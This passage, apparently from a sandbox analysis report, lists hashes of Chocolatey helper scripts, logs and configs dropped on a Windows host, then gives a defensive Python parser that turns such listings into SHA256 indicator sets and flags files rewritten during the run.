C:\ProgramData\chocolatey\helpers\functions\Get-ToolsLocation.ps1
| MD5 | 8e6fa8b04f177d447f161517548f4d47 |
| SHA1 | b39f9c37d1db563aa25298b60bcd5129bc6614c4 |
| SHA256 | 10ef1bd8a810ee08f601a207ac83a4c7d9ebad1a4777378cf3749e3c56b98c48 |
| SHA512 | 44137b572237b5b1fea00039d5cfe10f182f20595740e185f40026c87b07d3c05e1eb1fae82f4919c6795a0acdb79dbc9d28ba78d8f16e6dc32a42aeb5b74331 |
C:\ProgramData\chocolatey\helpers\functions\Get-PackageParameters.ps1
| MD5 | 847e9548a2e02e2e4d73f7fa08467e67 |
| SHA1 | 022e03be3a51aad9b3c0ef950c3eff14d09343e1 |
| SHA256 | d537580623ca8088692ad463e8913a83edb50963bd4b3b2b7b579e4e2b3b71f9 |
| SHA512 | 4c6ddbe465adc27bc97cb684a43b6baab59bbf21b8d8a2bc73d6ae618a6dff4816f139a246558e0b8c49fe7d2d5068f16f19cc132f21d7076d833764aa24f86c |
C:\ProgramData\chocolatey\helpers\functions\Get-OSArchitectureWidth.ps1
| MD5 | 96ce9de89c3e9d3afa2107ae3d30630a |
| SHA1 | 0856953bf3b426be54f6759ab1ec9be6a35c631b |
| SHA256 | 30f831b5189132d642edfd7cc9e4f44b11ae357652e1748073d94206544d4b77 |
| SHA512 | 4ec2bd382fb306aac0da8009e9e05e4e5b6b0ef248718415c1e255935d70a4d9211d98adb2992174660f07eb0239c8ac2491734d6c6d1e957b72ea568df6e012 |
C:\ProgramData\chocolatey\helpers\functions\Get-FtpFile.ps1
| MD5 | be4288d0cf3bf6203139f32b258a2d2a |
| SHA1 | 5deeb81fd84ee5038e08e546e7ee233dde64c0fd |
| SHA256 | a0d1fcec293a9d8b1340bbf54194884ef1c7495c3cbe9d4d5673edf2e5ccfb43 |
| SHA512 | 86090ee2fd2a77f8b38e3385af0189a657583e1ebdce2cf8ebd096714ae2081f9c62306cbc5712cd15475309d8c1ebc340842936afbff4bfee1c148f8626d47b |
memory/1064-3250-0x0000029DC5680000-0x0000029DC6182000-memory.dmp
C:\ProgramData\chocolatey\helpers\functions\Get-ChocolateyWebFile.ps1
| MD5 | 5c544f7d387ca56993a00e0a132a2e93 |
| SHA1 | 8214c283a1cda735803e8e2b76db9715932b150a |
| SHA256 | 5a763e6f6895fb36c99c942c56b2e5860e316978ce61ffb6d5a4599b357eae4e |
| SHA512 | 2577d38f631b8061bbc9b73ad0a33b47dc97929ba463141c6c9216cdf1219a278b30ea8420c399d72a440065954a0a54f01546dc17f34fce0151f35de87caa3e |
C:\ProgramData\chocolatey\helpers\functions\Get-ChocolateyUnzip.ps1
| MD5 | 37ce9d39ab4ab1d9e9d9373173152e1c |
| SHA1 | a0e06df561391156ac3623f56afa824173a6e34f |
| SHA256 | bb77491d99fa16f09048e81a2cedc29f3e6397d0d166ba2f72317aca04347c25 |
| SHA512 | 9f9b21df7bca9c15fac1582900932f77d6fbd1e80ec751d88141a6479d78ee2622df1b96bf1606c0df3c3cb0a7f553b5a8567c30590cbb1260dc8614dda8de49 |
C:\ProgramData\chocolatey\helpers\functions\Get-ChocolateyPath.ps1
| MD5 | 1235a3a21c64fe5563c06f65543d7d77 |
| SHA1 | 204bcd4af12c7de4c83b2d2cdb22955e6c2eacf2 |
| SHA256 | 18f1e1dc7ea4c3daae3fc51fd1373330c0132270180ed93bcac7a1d2843353f5 |
| SHA512 | b51476e608368120458d276b662a860cb863cc64f41556099c1bbd5c901b3a300b8d4266f44003b14a9d3d25a0832db7afe2c025858ff9d3c194acdabe0ef237 |
C:\ProgramData\chocolatey\helpers\functions\Get-ChocolateyConfigValue.ps1
| MD5 | 7686ed92bc6bc3606d914ac3d6555d73 |
| SHA1 | 6db9151efb0c2d693ac2acb8099967a7c32fe47b |
| SHA256 | 83eb927efcd495e15fd4ff5d043e1f0cf4b2dceded9aeb5a4af3db0cde2bfd8b |
| SHA512 | df7c252898fcf6829632b3d576b72c2a3232b24741fcb1ee50ebe7d7bafe86e0cceeb75f08b22ae177e57c6758572842b341c7d933f229d9d2c99388488b120d |
C:\ProgramData\chocolatey\helpers\functions\Get-CheckSumValid.ps1
| MD5 | 32fdfad78eecf1a6936525069d0eda09 |
| SHA1 | bf1f751146e73887de2c54a183d70a005a7453ab |
| SHA256 | 0e34c0c610bad2bca1c36e24908003886e6e8d506a7ce5cfee85c921faea61e9 |
| SHA512 | e9b9645391589365969e990967b5133de10090c212d000638c1553d98fdf7d0e6f99d9284d6f9f7385a7ffc2d37038bb430ce79bf3a44fa652ae745907833665 |
C:\ProgramData\chocolatey\helpers\functions\Format-FileSize.ps1
| MD5 | c1e5f78407a38c0f2bef0839274a30d5 |
| SHA1 | 2e5d91ff054720b94e7795474e23fbe202635165 |
| SHA256 | d47a44752fd6a983f9ab0e48aa8b12a2b0bc772ea0bb380c64723bb8e0b2ccbb |
| SHA512 | 81c22988af2065e94e4420e1b71d1bd2c12406a74f0984c7183a4905d4cc397a71728a9b0dc41ea625bb12e231fb002e3c965f92f60bcc12e5b0be81b26e056a |
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\ChocolateyTabExpansion.ps1
| MD5 | e7e5066e40b28d8258e840b6e1594d12 |
| SHA1 | d2f3caf9755d0b7746ae16936dbfea4acb3f44f5 |
| SHA256 | 9dcd26d37f492d76816f17529ae33851416dd4d7841dde7af505b9edee50baf3 |
| SHA512 | 5534cdc3c7fcbd6ac07d13b95aed8c1d2c8d007641c5184b8053c98dc0723ae3e7321722d443b68da68184d7f73ff347a988718f83f767bb6b5266a3af72fccc |
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\chocolateyScriptRunner.ps1
| MD5 | 0870ae75b1d8f0823ad8bb05bbdc90df |
| SHA1 | 9f6a23ac198321235d3d0b1ef1547863fe7c680d |
| SHA256 | 859cfa5d9dc747a5bc5651331977beef2177cf8335a24a8f0a26d7965fd66944 |
| SHA512 | 3bae1a9c7a7610ec86c5187de2ccffd295bd0d054a86000fe76a5d375842b98806a6d4f227dda5b0ab289b6365d664a2c3e55891add3e5cdc22efb75a410894e |
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\chocolateyProfile.psm1
| MD5 | 2d821e986cc3d5baed2b35fd7c98291c |
| SHA1 | 6838f726ef41a3fef1878af6e1b5d88dfc148ae2 |
| SHA256 | 91b8605fafba35d44f4352aa96f8d8fb366d0970e68bd194326f80eca67bf6d3 |
| SHA512 | 37695fe351a5ee1c7326f77f653a49cad9c9a3a2dce3f3761d2baaece77f927691ac47a81ba8d0ac2f89c868d72f0e9751ab0f78375dcec936566c6c87297d1a |
C:\ProgramData\chocolatey\logs\chocolatey.log
| MD5 | 52425ee6979f86a819f4f614b8addb7f |
| SHA1 | 61ba91afb4e81512d46df0c3d8c27c4ee860b4aa |
| SHA256 | 3cbba77e22d2d30d057546df486c872015a7fdc270d3ffc75c6d37a3e960f926 |
| SHA512 | 13a280d4f893070c43984f2468d65bff16cd72cf2dc44780c4be8eb20df35622c0c07f031f3ffc77820cdc648f7a17487d23102af2806bd80320d58bb976d84c |
memory/1064-3263-0x0000029DDFC20000-0x0000029DDFC70000-memory.dmp
C:\ProgramData\chocolatey\logs\chocolatey.log
| MD5 | 8793074b26a0b54dd18792dc6e235bfe |
| SHA1 | 4370bc34dc976c3a065f1438acb611efb9c02b52 |
| SHA256 | cd66b44072cfe06535717c040f6aa35b60e169a7b231fe2d6f9cc8fcb08676c9 |
| SHA512 | 1450a2ee4a1b762456819e1dfecb86db801748dccd6f099308591c0b841a39c68a38b2a30523160223686b55422fdf336f44ec5eecdd6e54ab8583491afb99fd |
memory/1064-3300-0x0000029DDF230000-0x0000029DDF24E000-memory.dmp
C:\ProgramData\chocolatey\config\chocolatey.config.backup
| MD5 | 8b6737800745d3b99886d013b3392ac3 |
| SHA1 | bb94da3f294922d9e8d31879f2d145586a182e19 |
| SHA256 | 86f10504ca147d13a157944f926141fe164a89fa8a71847458bda7102abb6594 |
| SHA512 | 654dda9b645b4900ac6e5bb226494921194dab7de71d75806f645d9b94ed820055914073ef9a5407e468089c0b2ee4d021f03c2ea61e73889b553895e79713df |
C:\ProgramData\chocolatey\config\chocolatey.config.1064.update
| MD5 | a3f016f5f2bd742ff1591950260f6f75 |
| SHA1 | 7feabbcc2e2d51c09065071f58da23990e215b72 |
| SHA256 | 6621f97fca4589b04e4c9a835344371fc3ecdf1f4cdac5c1492c05fcc23629f3 |
| SHA512 | ad6a96131221f3e8ac1e5bfc094ae1c09344a65f84b73d6933650e26417a569275e049b564b4c954641c7906a5fbbc886e37fa4a4bfb8216ccf3b519d09c7250 |
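The listing above is what a responder usually needs in machine-readable form: a hash set to sweep other hosts with, and a note of which paths were rewritten during the run (the same path appears several times with different digests, e.g. chocolatey.log and StartupProfileData-Interactive). The following parser is an added example, not code from the sandbox or from any project named on this page; it assumes only the layout seen here (a path line followed by `| MD5 | … |`-style rows, with `memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp` lines interleaved). The embedded sample is a constructed excerpt whose hashes are copied from the entries above.

```python
"""Turn a sandbox dropped-file listing into structured IOCs.

Added example; assumes the page's layout, not a documented report format.
"""
import re
from collections import defaultdict

# Expected hex length of each digest; a row of the wrong length is a
# copy/paste or extraction error and must not end up in a blocklist.
HASH_LENGTHS = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9A-Fa-f]+)\s*\|$")
MEM_DUMP = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")

# Constructed excerpt in the report's layout (hashes taken from the page).
SAMPLE = r"""
C:\ProgramData\TacticalRMM\565931752.ps1
| MD5 | e9fb33c49bee675e226d1afeef2740d9 |
| SHA1 | ded4e30152638c4e53db4c3c62a76fe0b69e60ab |
| SHA256 | 44e045ed5350758616d664c5af631e7f2cd10165f5bf2bd82cbf3a0bb8f63462 |
| SHA512 | 2661a981d48d58c9ceb1992e55061ce07af0d53b5f38b07de620376e0ea1d876c7e50965e67aee80fe723968bdb956dc7fd93e7923608534c8fb4d21739dbc48 |
memory/1064-3250-0x0000029DC5680000-0x0000029DC6182000-memory.dmp
C:\ProgramData\chocolatey\logs\chocolatey.log
| MD5 | 52425ee6979f86a819f4f614b8addb7f |
| SHA1 | 61ba91afb4e81512d46df0c3d8c27c4ee860b4aa |
| SHA256 | 3cbba77e22d2d30d057546df486c872015a7fdc270d3ffc75c6d37a3e960f926 |
| SHA512 | 13a280d4f893070c43984f2468d65bff16cd72cf2dc44780c4be8eb20df35622c0c07f031f3ffc77820cdc648f7a17487d23102af2806bd80320d58bb976d84c |
C:\ProgramData\chocolatey\logs\chocolatey.log
| MD5 | 8793074b26a0b54dd18792dc6e235bfe |
| SHA1 | 4370bc34dc976c3a065f1438acb611efb9c02b52 |
| SHA256 | cd66b44072cfe06535717c040f6aa35b60e169a7b231fe2d6f9cc8fcb08676c9 |
| SHA512 | 1450a2ee4a1b762456819e1dfecb86db801748dccd6f099308591c0b841a39c68a38b2a30523160223686b55422fdf336f44ec5eecdd6e54ab8583491afb99fd |
"""


def validate_digest(algo, digest):
    """True when digest is hex of the length algo requires."""
    return len(digest) == HASH_LENGTHS.get(algo, -1) and all(
        c in "0123456789abcdefABCDEF" for c in digest)


def parse_report(text):
    """Return (files, dumps): one dict per dropped-file entry, one per dump."""
    files, dumps, current = [], [], None
    for raw in text.strip().splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEM_DUMP.match(line)
        if m:
            pid, seq, start, end = m.groups()
            start, end = int(start, 16), int(end, 16)
            dumps.append({"pid": int(pid), "seq": int(seq),
                          "start": start, "end": end, "size": end - start})
            current = None          # a dump line ends the previous entry
            continue
        m = HASH_ROW.match(line)
        if m:
            algo, digest = m.group(1), m.group(2).lower()
            if current is None:
                raise ValueError(f"hash row without a preceding path: {line}")
            if not validate_digest(algo, digest):
                raise ValueError(f"bad {algo} digest for {current['path']}")
            current[algo.lower()] = digest
            continue
        if line.startswith("|"):
            continue                # table decoration that is not a hash row
        current = {"path": line}    # any other line opens a new entry
        files.append(current)
    return files, dumps


def versions_by_path(files):
    """Map path -> list of SHA256 values; >1 entry means the file was rewritten."""
    by_path = defaultdict(list)
    for f in files:
        if "sha256" in f:
            by_path[f["path"]].append(f["sha256"])
    return dict(by_path)


def sha256_set(files):
    """Deduplicated SHA256 blocklist for sweeping other hosts."""
    return {f["sha256"] for f in files if "sha256" in f}


if __name__ == "__main__":
    files, dumps = parse_report(SAMPLE)
    for path, versions in versions_by_path(files).items():
        print(f"{len(versions)} version(s): {path}")
    for d in dumps:
        print(f"pid {d['pid']} region 0x{d['start']:x}-0x{d['end']:x} ({d['size']} bytes)")
```

Sweeping with the SHA256 set alone is deliberate: MD5 and SHA1 are kept for matching older tooling, but a blocklist should key on SHA256. Paths with more than one version (the log and profile files here) are poor file-hash indicators because they change on every run; treat those as path indicators instead.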